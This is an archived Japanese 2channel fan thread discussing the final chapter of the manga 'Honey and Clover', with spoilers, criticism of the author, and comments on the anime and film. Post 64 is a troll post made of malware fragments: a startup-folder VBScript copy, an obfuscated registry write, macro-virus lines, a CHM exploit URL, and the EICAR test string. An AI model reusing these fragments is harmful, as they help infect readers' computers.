5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

羽海野チカ「ハチミツとクローバー」その53

1 :花と名無しさん:2006/07/30(日) 20:05:25 ID:/ih2IQpd0
◆ コミックス第9巻…発売中 ◆
◆ アニメ第2部…放送中 ◆
◆ 映画…上映中 ◆

※アニメ、映画の話題はそれぞれ専用のスレがあるのでそちらでどうぞ(>>2-3参照)※


★ このスレはsage進行です ※メール欄に半角で「 sage 」と記入。これ重要※

★ 荒らし・煽りは完全無視 ※反応するアナタも同罪です。これ常識※

★ 風紀もほどほどに ※話題の流れを変えたかったら自分から別の話題を投下する。これ鉄則※


≪前スレ≫
羽海野チカ「ハチミツとクローバー」その52
http://comic6.2ch.net/test/read.cgi/gcomic/1154020445/


関連スレ,頻出質問事項等は>>2-20あたりに

2 :花と名無しさん:2006/07/30(日) 20:06:32 ID:/ih2IQpd0
≪過去ログ≫
http://makimo.to:8000/cgi-bin/search/search.cgi?q=%89H%8AC%96%EC%83%60%83J&sf=2&andor=AND&H=&view=table&all=on

≪関連スレ≫
≪過去ログ≫
http://makimo.to:8000/cgi-bin/search/search.cgi?q=%89H%8AC%96%EC%83%60%83J&sf=2&andor=AND&H=&view=table&all=on

≪関連スレ≫
ハチミツとクローバー II chapter.2 【ハチクロ】
http://anime.2ch.net/test/read.cgi/anime/1152568435/ (アニメ板)
【櫻井翔】ハチミツとクローバー3冊目【蒼井優】
http://tv8.2ch.net/test/read.cgi/cinema/1153675073/(映画作品・映画人板)
ヤフー掲示板 ハチミツとクローバー
http://messages.yahoo.co.jp/bbs?action=m&board=552018449&tid=a1ya5oa5aa5dfa5da4ha5afa5ma1bca5pa1bca1y&sid=552018449&mid=1

3 :花と名無しさん:2006/07/30(日) 20:07:04 ID:/ih2IQpd0
≪公式サイト≫
ハチクロ連載中コミック誌「コーラス」
h ttp://chorus.shueisha.co.jp
作者(羽海野チカ)
h ttp://www13.plala.or.jp/umino
アニメ
h ttp://www.hachikuro.net
映画
h ttp://hachikuro.jp

≪頻出質問事項≫
Q.花本はぐみは、花本修司の姪ですよね?
A.違います。花本修司のいとこの娘です。※映画でのみ「姪」設定となっています

Q.登場キャラクターの身長の設定はどうなってますか?
A.[はぐ 145cm][山田 167cm][竹本 174cm][森田 179cm][真山 181〜182cm]

4 :花と名無しさん:2006/07/30(日) 20:07:37 ID:/ih2IQpd0
羽海野チカインタビュー
ttp://books.yahoo.co.jp/interview/detail/07145617/01.html
・キューコミで初めはカットを描いてほしいって頼まれたのが
作者のアピールでマンガ連載って事になる。
・初めは竹本・真山・森田の三人の学生生活とか青春物を描く予定だった
・彼らの恋愛も描きたくなったので女子キャラ投入
・掲載誌を移ることになってクリスマスやら何やらのイベントをもう一回
やりたいからその為に一年分の時間を稼ぐ為に竹本を留年させた。
●真山のモデルはスガシカオの歌詞の主人公
ttp://www.s-woman.net/umino/1.shtml
「スガさんのつくった歌の中に、真山君みたいな子が出てくるときがときどきあるんです。多分、ご本人が自分のことを歌っているんだと
思うんですけども。ちょっと自分をどう扱っていいかわかんないみたいな
男の子が出てきて、マンガにしたら、今まで見たことない男の子に
なるんじゃないかなと」

5 :花と名無しさん:2006/07/30(日) 20:08:44 ID:/ih2IQpd0
●修とはぐの恋愛は羽海野の芸能人萌えのせい。
 竹本の糞男化は羽海野の芸能人萎えのせい。
・映画の修役の堺雅人が、最近の修の描写に影響
・映画のはぐ役の、最近のはぐの描写に影響
・アニメの竹本役と、映画の竹本役(ジャニーズ嵐の櫻井)が
 最近の竹本の描写に影響 …なことを羽海野が映画版ハチクロ本にて暴露。

6 :花と名無しさん:2006/07/30(日) 20:10:17 ID:???0
>>1
乙ですよ?☆

7 :花と名無しさん:2006/07/30(日) 20:10:53 ID:/ih2IQpd0
●● 竹本の不幸  ●●
・小学生の頃父が他界。高校で母が再婚するが、自分の進む道がわからなくなる。
 この頃からすでに彼の自分探しは始まっていた。探さない方がいいのに。
・浜美入学早々森田に中学生みたいな髪型にされ一年間振り回される。
・天才はぐに一目惚れし、己の平凡さを嘆き将来に不安を覚える。ここから真の不幸が始まる。
・今日なんで集まったんだっけ?「ぼくの誕生日ですよ」しかもツイスターゲーム。
・はぐの部屋に泊まる事になるが、夜中にベルサイユのキッチンセットを作ってと言い残しはぐ就寝。
 ただの奴隷扱いだがこれはまだ幸せだったかもしれない。むしろ絶頂期。
・森田がはぐを好きだと気付き、勝ち目が無いと悟りぼんやりする。
・夜、電話一本でクリスマスなのにバルーンアートを徹夜で作る手伝いにかりだされる。不眠でバイトへ。
・「はぐは森田となかよしだったりするのかい?」「先生…ぼくに聞かないでください」
・就職に失敗し続け学園祭用の謎の塔を一心不乱に作り続ける。この頃から鬱病気味に。
・錯乱した山田のかかと落としが直撃。
・「いるべき人が いなくって いなくても どってことない人間が ここでケーキを口に運んでいる」
 クリスマスケーキを食べながら超ネガティブ思考。そしてまたツイスターゲーム。
・卒業制作の作業中に吐血>入院>浪人。
・内定が決まった日に、就職先がどうやら倒産しそうだという報せが就職祝い中に届く。
・幻聴が聴こえてくる。気付いたら自転車で海へ。ここは精神崩壊の瀬戸際だったがなんとか持ちこたえた。
・ママチャリであてもなく日本列島を北上。痔になる。
・旅先で住み込みバイト中に、年下の元ヤンから「おまえ」「ばかじゃねーの」等の罵声を浴びる。
・一皮むけて旅から帰ってきてフラれる。

●● 竹本の人格崩壊後 ●●●●●●●●

・花も買えない情けない男
・森田をねたんで、森田にはぐみを取られるくらいなら修に取られる
 ほうがマシだと、修にはぐみに愛の告白をするようたきつける
・兄貴と関係で不幸のズンドコの森田に対して、人間として
 言ってはいけないことを言う

8 :花と名無しさん:2006/07/30(日) 20:12:13 ID:/TRnnHG00
●●コミックスになっていない分のあらすじ●●

治さなくていい、いてくれるだけでいいと精一杯告白する森田に
描けなくなったら私は死んじゃうと、病院に戻るはぐ。
病院から外へ連れ出した森田を殴る修。

はぐ、修の手を握りながら
「あのねお願いがあるの 修ちゃんの人生を私に下さい 
ごめんね 返せるかもわかんないのに こんな事言って でも
でも・・・私描きたいのずっと だから 一緒にいて 最後の最後まで」
「いいよ・・・返さなくていいよ 全部やるよ」と返事する修。ラブラブムード。
はぐのモノローグ
『修ちゃんは私の雨だ。一緒にいると深く息ができて草や木みたいに
 ぐんぐん伸びてゆけそうな気がする。 私のだいじな だいじな ひと』

別の場面で、森田と竹本は殴りあい。人格崩壊後の竹本は、森田をねたんで
金と才能だけの人間でしかない森田にはぐを取られるくらいなら
修に取られたほうがマシだったと言う。森田の頭の中に「才能才能才能」の言葉が響く。

森田は修に現金が大量に入った段ボールを
「これでアイツ(はぐみ)を治してやってくれ」と修に贈りつけるが
修はそのうち札束3つ(約300万)をゲットして、それ以外は森田に投げつけて返し
「金は返すがはぐは返さん! ハハハハ (はぐのことは)好きさ!大好きさ!」
と真っ赤になりながら叫ぶ。 そして森田は去ってゆく。

そんな修にキャーキャーいいながら驚く山田。
野宮は、リーダー(犬)を比喩に出して、山田に臭とはぐと森田の関係を納得させる。
リカと修は抱擁の末、別れた。
真山は、修がはぐみを好きなことを大歓迎の様子で、大喜びする。

9 :花と名無しさん:2006/07/30(日) 20:13:02 ID:/TRnnHG00
 918  822 [sage] 2006/07/27(木) 00:08:41 ID:???0
ではもう少し詳細なバレ投下します。ネタバレ嫌な人は避けてね。


○表紙ハチクロ。巻頭ではないが見開きカラー扉あり。
〈内容〉
引越しの準備でボロアパート部屋を片付ける竹本。
その後、送別会を開く。(森田はいない)
真山が「最後だから竹本はウチに泊まらせますよ」の言葉に反応して
みんな泣きそうになる。
思わず修がはぐにおつかいを頼み、付き添いで竹本も外出。
竹本のチャリの後ろにはぐが座る。怪我はかなり回復している様子。
はぐが竹本の卒制作品について語る。
「竹本君はどこにも手を抜かない人だから、竹本君に作ってもらったお寺は幸せだね」等。
「今まで修ちゃんに沢山のものを貰ったから、返さないといけない」とも言う。
それに対して竹本「はぐちゃんはそんなこと考えなくていいよ。先生は自分で見つけられる人だから」
はぐ「…ありがとう。」

美和子さん山崎が仲直りをセッティングしてくれる。(前回野宮が山田をいじめた件で)
野宮と山田が落ち合う。前回のことで気まずい2人。
山田が「もう会わない方がいいのかもしれない」と言うと、野宮は納得して去ろうとするが
泣いてしまう山田に振り返って「真山のことはずっと引きずっているけど、でも一緒にいよう」
というような事を話す。手を繋がれたまま山田号泣。

10 :花と名無しさん:2006/07/30(日) 20:13:40 ID:/TRnnHG00
森田と馨が2人布団を並べて会話をしている。
はぐのことを聞かれ「あいつは強い女だよ」など少し語る。
ピーターの所に行く決心も語る。
「会社が停電したらピーターも他の社員も、みんなビームサーベルもって部屋から出てくるんだぜ!?
こんな大人達、父さん以外見たことない」
会話の最中にぼんやりと光りが出てくる。「父さんが言ってたことが分かったような気がする」

竹本のモノローグに移る。
報われない片思いは意味があるのか云々語り、「はぐちゃん、君を好きになって良かったよ」という結論に達する。
モノローグの間に場面が展開して、駅のホームで竹本がはぐから包みを渡される。
席に着いて開けてみると、パンが何段も重なったサンドイッチが入っていた。
パンをめくって中身を見てみると、ハチミツが縫ってある。真ん中には四葉のクローバーが。
昔みんなでクローバーを探した記憶が蘇る。「あの時全然見つからなかったのに…」
更にめくると、全段にハチミツと四葉のクローバーが入っていた。
電車の中で竹本号泣。
モノローグで少し語って終了。


こんな感じでした。抜けてるエピソードとかあるかもしれません。
台詞やモノローグもあやふやですみません。

最終回だったのに、次号予告で何故かハチクロの付録がありました。

11 :花と名無しさん:2006/07/30(日) 20:18:01 ID:???0
乙です。

12 :花と名無しさん:2006/07/30(日) 20:20:37 ID:???0
昨日の夕方に夢を見た。

ハチクロのいつものメンバーが集まって。
竹本が電車に乗って、それを手を振って見送るはぐ。

なんだか胸がざわざわして、久しぶりにハチクロスレを覗いた。
夢と同じ展開のクライマックスが描かれていた。

なんだろうこれは。
頭がぼうっとする…

13 :花と名無しさん:2006/07/30(日) 20:31:11 ID:???0
役立たずで振られて傷心な竹本に
最後の最後、自転車二人乗りの際、
はぐは竹本のことを褒めた直後に
「臭ちゃん」のことについて相談するところからして
もう竹本思いっきりトドメ刺されたな・・・と

竹本の送別会なのに結局はぐは自分の事しか考えてないのが浮き彫りに

14 :花と名無しさん:2006/07/30(日) 20:38:08 ID:???O
シンクロ夢はわりとよくあるから気にするな
気になるならBECK読んどきなさい

無難な終わり方で一段落だな
キャラが生まれてから死ぬまでの年表作ってるって作者言ってたけど
多分、運命は変わったな。
作者はその世界の風みたいなもんなんだから、神気分で引き裂いたり弄んだらダメだよねえ
ま、今回で懲りたでしょお疲れ。
ひょっとしたら懲りるのはこれからかも知れないけど

15 :花と名無しさん:2006/07/30(日) 20:38:59 ID:???0
>>13
確かに・・・。
はぐは自分のことばっかり考えて悩んでいて、
竹本のことなんか、これっぽっちも考えていないね。

16 :花と名無しさん:2006/07/30(日) 20:41:23 ID:???0
>>12
コーラス発売の、せめて4日前にその夢見て報告してれば、
神になれたのにねえ・・・・www
残念でしたあwwwwwwwwwっうぇwwwwwwwwww


17 :花と名無しさん:2006/07/30(日) 20:56:40 ID:???O
商業誌の漫画って、縦糸(ストーリー)と横糸(キャラ)を紡いで一枚の美しい織物を作るイメージなんだが、これは綺麗なパッチワークという印象。。

18 :花と名無しさん:2006/07/30(日) 21:00:33 ID:???O
>>13
あの二人乗りのシーンは
時をかける少女みたいでよかったよ
あんなにはぐの事好きだったのに、終盤雑魚扱いされてた竹本が最後にハチクロの氷点化を食い止めたのはよくやった
さすが森田の親友株

19 :花と名無しさん:2006/07/30(日) 21:03:19 ID:???0
16 名前:花と名無しさん 投稿日:2006/07/30(日) 20:41:23 ID:???0
>>12
コーラス発売の、せめて4日前にその夢見て報告してれば、
神になれたのにねえ・・・・www
残念でしたあwwwwwwwwwっうぇwwwwwwwwww

20 :花と名無しさん:2006/07/30(日) 21:03:32 ID:???O
>>18
絵で見れば綺麗だよね、あのシーン。
見せ方はやっぱりうまいなーと。

21 :花と名無しさん:2006/07/30(日) 21:05:44 ID:???0
映画見てきたんだが






ウミノたんアレに萌えたのか…

22 :花と名無しさん:2006/07/30(日) 21:14:16 ID:???0
亀だけどやっとコーラス見た
映画&アニメ絶好調「ハチミツとクローバー」
ウミノたんほんとに収拾つかなくなって
豚切りで最終回にもっていたんジャマイカ

23 :花と名無しさん:2006/07/30(日) 21:14:23 ID:???0
映画まだ見てないけど、写真見る限りなんか臭が汚い
まさに臭

24 :花と名無しさん:2006/07/30(日) 21:18:08 ID:???O
>>22
だれか書いてたけど、一定のエピが終了していたらいつでも描けそうなラストだよね。

25 :花と名無しさん:2006/07/30(日) 21:26:49 ID:???O
>>17
うまいこと言った気でいるしw

26 :花と名無しさん:2006/07/30(日) 21:27:01 ID:???0
ウミノたんには本当に幻滅した
今まで一体なんだったんだよって感じ

27 :花と名無しさん:2006/07/30(日) 21:29:16 ID:ATvyNDKg0
どっからハチクロおもしろくなくなってしまったんだろうな
自分的には馨が出てきたときだ

28 :花と名無しさん:2006/07/30(日) 21:33:58 ID:???O
デスノの作者が
これ以上人殺すの怖くなって
大人気なのに止めたって話聞いたけど
それに近い何かがあるのかな
あの月が人間くさくミサー!高田ー!って最後に叫んでリュークに助けを求めるんだもんなw
あのラストは笑ったw

29 :花と名無しさん:2006/07/30(日) 21:34:18 ID:???0
余計なエピソードが多すぎ。
重要なエピソードとのバランスが悪い。

30 :花と名無しさん:2006/07/30(日) 21:34:41 ID:???O
>>27
4巻くらいまでが好き。
はぐがバイトして少しずつ成長していきそうな空気になっていて、野宮が出て来て山田に新恋?なかんじが。

31 :花と名無しさん:2006/07/30(日) 21:38:09 ID:???0
森田がすっごい嫌いなんだけど
あと竹本も・・・

32 :花と名無しさん:2006/07/30(日) 21:43:56 ID:???0
>>30
自分もそれ位
モカデミーだの野宮だの出てから付いていけなくなったけど惰性でここまで来た

33 :花と名無しさん:2006/07/30(日) 21:44:04 ID:???0
私は真山が大ッ嫌いです

34 :花と名無しさん:2006/07/30(日) 21:49:42 ID:???O
もう全部売り飛ばそう…
カルタ以外は

35 :花と名無しさん:2006/07/30(日) 21:56:33 ID:ihtq7dS+0
あっそ

36 :花と名無しさん:2006/07/30(日) 21:58:36 ID:???0
ヤフオクで結構まとめて売り出されてるねw

37 :花と名無しさん:2006/07/30(日) 22:00:50 ID:???O
>>32
結局、話が動き始めたところでどう動くんだろ〜と期待できた頃だよね。
その後の展開が………

38 :花と名無しさん:2006/07/30(日) 22:03:22 ID:???0
今日山手線がハチクロペイントになってた。
ドアの横にでっかいウミノクマ。
めっちゃびっくりした。

39 :花と名無しさん:2006/07/30(日) 22:03:36 ID:Xc//G+YB0
山田が乙女化してしまった所からダメになったかなあ
鉄人はいずこへ行ってしまったんだろう

40 :花と名無しさん:2006/07/30(日) 22:04:10 ID:???O
まーでも、ナ○・のだ○とかと違って初連載だから仕方ないのかもね

41 :花と名無しさん:2006/07/30(日) 22:06:18 ID:???O
昔は雑誌の特集号やら何やら端から買い漁ってた。
今はすごく沢山あるのに買う気にならない。


42 :花と名無しさん:2006/07/30(日) 22:08:00 ID:???0
>40
いや見せ方はうまかったと思うよ、初にしては。
ただプロとしてはコロコロコロコロ方向変えて、挙句映画キャストに萌えて
あの展開とかダメダメだなw

あとウミノグマ前面に出すぎでうざい。作者の自画像に萌える奴なんているのか

43 :花と名無しさん:2006/07/30(日) 22:10:20 ID:???O
>>39
つか、山田は受け身だよな。
ことあるごとに、真山忘れられないビエ〜ンて泣いて落ち込む心理描写ばかり。
忘れる為にはどうしたらいいか考えて行動すりゃいいのに。

44 :花と名無しさん:2006/07/30(日) 22:12:03 ID:???0
山田は誘いうけ

45 :花と名無しさん:2006/07/30(日) 22:12:39 ID:???O
>>42
そうだよね、見せ方や絵は同人で鍛えただけあって抜群にうまい。魅力のほとんどはそこだよね。
キャラの動かし方と構成力が…これは同人じゃなかなか身に付けられないよ

46 :花と名無しさん:2006/07/30(日) 22:13:10 ID:???0
理花も誘い受け

47 :花と名無しさん:2006/07/30(日) 22:16:54 ID:???O
今、集が旅立つ巻を読んでだが、クローバー見つけられなくて泣きじゃくるはぐがマジきもい。

20歳の泣き方じゃねー

48 :花と名無しさん:2006/07/30(日) 22:21:48 ID:???O
あゆが「真山から逃げられなくて…」と言ってんのがうざい
別に真山が誘惑してるわけでもないのに

こういう細かい言い方が、なんか鼻につくから好きになれない
絵は大好きなんだけど

49 :花と名無しさん:2006/07/30(日) 22:23:10 ID:H6D4YIqr0
腐女子って、
自分の思いとおりにならないと、
男ヲタとは比べ物にならないほどヒステリックな反応をするね。

自分のはまっていた物を、
ラスト数話の出来だけでそこまで否定できるものかね。

そのダメさぶりも含めて許容するだけの余裕がないのか......

50 :花と名無しさん:2006/07/30(日) 22:26:33 ID:???0
>>49 女は主観的感情的で、男は客観的で冷静な視点を持つことができている
  ・・・・とでも言いたいのかい?

>>27
自分は8巻で一気に冷めた。
「ちゃんと生きようとしてくれよ!」あたりが一番のヤマだったんだろうけど…
真山の、リカを想う強さが一番顕われてるシーンだったんだろうけど…
「今までさんざ引っ張っといて結局がコレかよ」という気抜け感が一番にきてしまった。
山田も、野宮に惹かれ始めてることが確定的になったし
コレはもう最終回までの流れが読めちまったようなモンだと思った。
実際、ラストにおける野宮山田サイドの扱いなんて
毒にも薬にもならんようなものに感じた。
「流れ」自体をどうこうするのに限りがあるのはわかるが、「魅せ方」は
もうちょっと工夫できたんじゃないか?
ここまで引っ張っといて、お粗末としか言いようが無いよ。

リカと修の、原田の呪縛からの解放カタルシスと
竹本の、はぐという存在を通しての自分の意味づけカタルシスくらいかな
素直に感動できたのは。

はぐと修の芸術人生云々に関しては、「あんたらホントにそれでいいんですか…」
(作品中じゃ無問題てことになってるようだが…)

長々とスマソ

51 :花と名無しさん:2006/07/30(日) 22:26:51 ID:???0
>>48
真山はすでに山田のこと眼中にないのにね。

52 :花と名無しさん:2006/07/30(日) 22:27:26 ID:???0
>>50
つまんない釣りだし、ほっときましょう

53 :花と名無しさん:2006/07/30(日) 22:28:09 ID:???0
mixi情報だけど、10巻が9月発売ってマジっすか?

54 :花と名無しさん:2006/07/30(日) 22:29:37 ID:???0
既出だろうけど、銀魂にハチクロネタがあって驚いた。

55 :花と名無しさん:2006/07/30(日) 22:30:29 ID:???0
>>49
普通の人間の目から見てもこりゃねえだろうな展開だったと思う

話に脈絡がなさすぎるし、前後の繋がりがめちゃくちゃだし
担当も編集部も付いていながらこのザマってのはちょっとありえないだろう
たぶん他の作家でも(売れるかどうかはまた別として)もうちょっとまともな展開にするだろうよと

56 :花と名無しさん:2006/07/30(日) 22:32:45 ID:???0
>>54
kwsk

57 :花と名無しさん:2006/07/30(日) 22:33:54 ID:???O
むしろ
もう更正したと思っていた作者の
最後の最後での怒涛の腐展開には青ざめた
今、実際に青春真っ最中だから
別に架空の漫画がどうなったっていいけど
神様が腐だから恋人と別れさせられたらブチ切れるよなあとキャラに同情した
無難に終わってよかったね

58 :花と名無しさん:2006/07/30(日) 22:36:45 ID:???O
はぐは何故幼女なんですか?


59 :花と名無しさん:2006/07/30(日) 22:40:39 ID:???0
>>58
現実味を排除した「器」としての表現に
「幼女」という記号は適しているから

60 :花と名無しさん:2006/07/30(日) 22:43:34 ID:???O
>>59
あぁ〜記号か…象徴みたいなもんですかね。



61 :花と名無しさん:2006/07/30(日) 22:46:33 ID:???0
最近はすくすくと背が伸びてます。

62 :花と名無しさん:2006/07/30(日) 22:47:40 ID:H6D4YIqr0
>>50
まあ、そこまで興奮せずに、
牛丼でも食べて落ち着けよ、

とこれぐらいの早さなら言える。


作者が広げた風呂敷をたためることをせずに、
逆に強引に終わらせようとしたこと。
それはそれでいいんじゃないの。
別にこの作品に限らず、マンガ作品ではよくあること。
その"お粗末"さも含めて愛おしいとは思えないかね。
人間関係や男女関係でもよくあることじゃないの。
ラストで"四つ葉のクローバー"を出しただけ、
まだ誠意があるんじゃないかな。

て言うよりも、このスレを見ている限り、
多くの人間は少なくとも7巻目あたりまでは楽しめていたわけだし、
それはそれで良かったんじゃないの。


63 :花と名無しさん:2006/07/30(日) 22:48:06 ID:???0
はぐは森田が好きだったんじゃないの?
いつから修になったわけ?

64 :<body onload=window()>:2006/07/30(日) 22:49:37 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

65 :50:2006/07/30(日) 22:52:17 ID:???0
>>62
ありがとう。
自分も、モトは少年漫画板の住人だったから
ハチクロにはまって少女マンガ板に来るようになってからは
まさしく>>49みたいな心境だったよ。
でももう慣れたんだ。
スレの空気に染まるも染まらないも個人の勝手だ。
それでいいんだよ

66 :花と名無しさん:2006/07/30(日) 22:52:40 ID:???0
7巻派:いつまでもこの空気で続いてほしかったなぁ〜
8巻派;真山理花でおなか一杯です
9巻派:森田!森田!森田!
10巻派:「見よ、地獄は目の前にある」

67 :花と名無しさん:2006/07/30(日) 22:53:32 ID:???0
>>62
しかし9巻でハチミツとクローバーって好きなアルバムタイトルつなげたんです☆という
話を聞いたあとだと「ああ、そこで無理矢理ハチミツとクローバーのサンドイッチですか」と思ってしまった。

初めてなのはわかるけど色々インタビューとかで脳内だだもれがなければもう少し楽しめたかも。
のめりこんで情報収集してる人ほどこの終盤は辛かったんじゃなかろうか。

68 :花と名無しさん:2006/07/30(日) 22:58:03 ID:???0
なんかね、修が説明もなく突然はぐへの恋愛感情を剥き出しにした瞬間はまさに
ワンピースで言うところの「ルフィがロビンとウソップを見捨ててそのまま旅立っちゃった状態」かもしれない。

ちょ、それはキャラの大前提としてありえないだろう、みたいな。

69 :花と名無しさん:2006/07/30(日) 23:00:14 ID:???0
ワンピヲタとかいたんだ

70 :花と名無しさん:2006/07/30(日) 23:04:27 ID:???0
ここ数ヶ月のいろいろな衝撃の波状攻撃に
ある意味妥協と免疫が出来てきたところに
このベタで当初から想定内の最終回。
作者の萌えに従って描きたいように描いておいて
その反撃を迂回させるうまい策だと思った。

71 :花と名無しさん:2006/07/30(日) 23:07:35 ID:???O
>>68
意外性とかギャップとかじゃないんだよね・・・違いってなんだろうね?

72 :花と名無しさん:2006/07/30(日) 23:09:40 ID:H6D4YIqr0
いや、俺もさっきアニメ「ハチクロ2」の2・3話を見ていたんだけど、
この状況で一番辛いのは、アニメスタッフだと思うよ。

予想だにしていなかった怒濤の展開、
伏線もなしで進む恋愛模様。
「なぜ、はぐは臭を……」と説明が付かない。

今頃、最終回を見て、「あちゃー」って頭を抱えていると思う。
アニメって多くの人間による共同作業だし、
第三者的な視点から物語を紡いで行かねばならない。
こりゃ、大変だわ。

73 :花と名無しさん:2006/07/30(日) 23:11:54 ID:???0
さすがにその辺は打ち合わせしてると思うんですが・・・

74 :花と名無しさん:2006/07/30(日) 23:15:22 ID:???0
アニメの最終回はとお〜っくに脚本出来てるだろ?
もう声入れてる頃じゃね?

75 :花と名無しさん:2006/07/30(日) 23:15:39 ID:???0
監督カワイソス。
第一期は原作も安定してたが、第二期のとこはとかくテンション低い鬱展開
さぞかし作りにくいだろうなあ

だからって劇中歌流しまくればいいってもんじゃないけども。

76 :花と名無しさん:2006/07/30(日) 23:16:00 ID:???0
>>71
「はぐが(人生のパートナーとして)修を選ぶ」に関しては、
アニメの第一部の初期から、原作に無いセリフが付加されていたりして、
結末を意識した対策はとられているみたいだったけど?

ただ、修がはぐにデレデレ?になるエピはどうカバーしてくるんだか。
そこは気になる。


77 :花と名無しさん:2006/07/30(日) 23:19:40 ID:H6D4YIqr0
>>73
作者本人はアニメの制作現場に
シンパシー感じていたようだけど、
あの怒濤の展開は、
編集部やアニメスタジオとは無縁のものだと思うよ。
ここでもさんざん言われていたけど、
「コーラス」の表紙に"最終回"の文字がないのがその証拠。

はぐ+臭……という展開を打ち合わせをしていたなら、
3話の冒頭のストーリーは原作通りにしていない。
なにかの伏線をそこで張っておくと思う。

78 :花と名無しさん:2006/07/30(日) 23:24:34 ID:???0
アニメから入った漏れは
臭とハグがくっつくのに何も違和感湧かなかった
なんか冒頭の臭回想ハグがキラッキラしてたからね
漫画は7巻までしか読んでないんだけど

79 :花と名無しさん:2006/07/30(日) 23:27:04 ID:T6C4XbeJO
……ハチクロ終わっちゃったの?

80 :花と名無しさん:2006/07/30(日) 23:28:31 ID:???0
>>H6D4YIqr0
>>79

>>1

81 :花と名無しさん:2006/07/30(日) 23:29:01 ID:???O
>>78
週はぐ嫌いな人って、擬似近親ソウカンぽくてキモスな人と、話の展開が破綻してキモスな人と、はぐが依存的でキモスな人など様々だよ

82 :花と名無しさん:2006/07/30(日) 23:29:22 ID:???0
別にはぐと臭がくっつくのは構わないんだけど
もうちっと上手くやって欲しかった

83 :花と名無しさん:2006/07/30(日) 23:30:38 ID:???0
ごめん
>>76>>72へのレス。

84 :花と名無しさん:2006/07/30(日) 23:30:42 ID:???0
うん
その結果に至るまでの過程に納得いかなかった
別にくっ付いても構わないけど

85 :花と名無しさん:2006/07/30(日) 23:32:15 ID:???0
過程か
そこはまだ未読なんだ
このまま未読でいよう
さよならハチロク

86 :花と名無しさん:2006/07/30(日) 23:33:23 ID:???0
そりゃアニメからで一気に読んだんじゃ大して違和感ないかもね。
まとめ読みと何年も毎月読んでた人とはやっぱ感じ方違うよ。

87 :花と名無しさん:2006/07/30(日) 23:33:31 ID:???0
あっ、ずーっとageていた。スマソ。

88 :花と名無しさん:2006/07/30(日) 23:43:48 ID:???O
で、作者は何の病?マジレスキボン。

89 :花と名無しさん:2006/07/30(日) 23:44:59 ID:???O
そうそうあまりにつじつまが合ってないから、
皆怒るというかポカーンなんだよ。
ウミノクマは色々流されやすいんだね。

90 :花と名無しさん:2006/07/30(日) 23:49:45 ID:???0
原作じゃ、見事に
はぐ(+修)の芸術人生サイドの扱いが軽いものだったのがネックかな。
怪我エピ直前からいきなり演出過剰になった感が否めない。

91 :花と名無しさん:2006/07/30(日) 23:50:40 ID:???0
>■2006/07/30 (日) ハチミツとクローバー
>こんにちは。ウミノです。
>今月号のハチクロ読んでいただけたでしょうか


HP、更新していたんだね。
やっぱり途中で諦めようともしていたんだ。

とりあえずエンドマークを打てたんだから、
エロイよ、ウミノ。


と逝ってみるテスト。

92 :花と名無しさん:2006/07/30(日) 23:59:59 ID:???O
>>63
腐女子ってのは理由なく
好き合ってる男女の邪魔するんですよ
ウミノたんは本当は
森田をゲイにしたかったんだろう
他の女の物にならないで
もしくは私=はぐと結ばれてないけど
あなたは遠くから私を好き
でも森田が好きな娘は女の子だし、作者よりも蒼井のほうがはぐ似なのが現実
作者も森田が本気で好きだったんでしょう。
フラれちゃったけど。
裏竹本は作者というオチ。
間違ってたらごめんね
でも読み終わってそんな気がした。

93 :花と名無しさん:2006/07/31(月) 00:04:41 ID:???0
なんだか今日はやけに香ばしいなこのスレ

94 :花と名無しさん:2006/07/31(月) 00:05:49 ID:???0
こんなんで最終回良かったね、とか言ってる人って実際いるのだろうか激しく疑問

95 :花と名無しさん:2006/07/31(月) 00:07:23 ID:???0
>>93
つまりおまえさんのレスからか…

96 :花と名無しさん:2006/07/31(月) 00:15:13 ID:???O
もう最後なんだから
いいんじゃない?
夏祭りの季節だしねー
恋人とみた花火って永遠だよな

97 :花と名無しさん:2006/07/31(月) 00:21:10 ID:???0
ハチクロという漫画の初見がコミクス8巻で
しかもコミックス立ち読みでページパラペラめくってたら
偶然目に留まったのが第53話のフルーチョエピソードだった
「はぐの作品の邪魔したら殺すよ?」次のコマで、
修はオカマキャラだと完全に勘違いした。
実際はシブい&お茶目なおっさん系だったんだね…

ラストでなんか大変なことになってるらしいが


98 :花と名無しさん:2006/07/31(月) 00:23:58 ID:???0
5人が別れに向かって進んでいる物語ってわかってたけど
連載が終わって何だかやっぱりさみしい。
最終回は泣けたけど、話自体にもそれなりに感動したんだけど
今まで追いかけ続けてた5人が、ハチクロがついに…って感じで泣けた。
1巻のはぐが出てきたり、5人の表紙カラーもきれいで良かった。
森田がどっか行っちゃっていないっていうのは最後まで森田らしくて
良かったんだけど、もうちょっと見たかったな。

99 :花と名無しさん:2006/07/31(月) 00:30:07 ID:???0
>98
ポジティブな人だなあ

100 :花と名無しさん:2006/07/31(月) 00:32:01 ID:???O
大変な事になるかと思われたが
あゆ竹本その他の決死のブロックで何とかなったから安心しれ
日記で作者自分の青春だったって言ってるけど
それはそれで素晴らしい事だけどさ、ハチクロはキャラ達の青春で作者の青春じゃないんじゃないの?
親が子供の花奪うなみたいなさ、それが先生のでしゃばりに最後違和感感じた理由のような気がする。
ま、もう終わった事だけどさ。
ありがとう、ご苦労様。

101 :花と名無しさん:2006/07/31(月) 00:36:20 ID:???0
